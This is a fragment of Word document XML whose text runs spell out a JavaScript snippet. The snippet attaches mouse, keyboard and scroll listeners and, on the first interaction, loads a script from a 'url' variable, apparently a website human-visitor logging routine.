        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, handler, false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3309A1" w14:textId="77777777"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t>} else if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>window.detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0539EE" w14:textId="77777777"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r>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>document.detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">'on' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, handler);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C5480" w14:textId="77777777"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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9281B4" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758689A3" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>contextmenu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dblclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> drag </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dragend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dragenter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dragleave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dragover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dragstart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> drop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>keydown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> keypress </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>keyup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mousedown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mousemove</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mouseout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mouseup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>scroll'.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(' ');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455B3BB5" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>logHuman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E7495" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wfscr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>('script');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B4C33" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wfscr.type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C712BA" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wfscr.async</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35262703" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wfscr.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> + '&amp;r=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Math.random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B375D5" w14:textId="77777777"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t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>document.getElementsByTagName(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>'head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC3AC0" w14:textId="77777777"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r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> i = 0; i &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evts.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E26D7CD" w14:textId="77777777"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r>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>removeEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[i], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>logHuman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1331BD93" w14:textId="77777777"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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76426BAB" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2972F5" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> i = 0; i &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evts.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2C1A50" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>addEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[i], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>logHuman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA4BE6" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753E926A" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
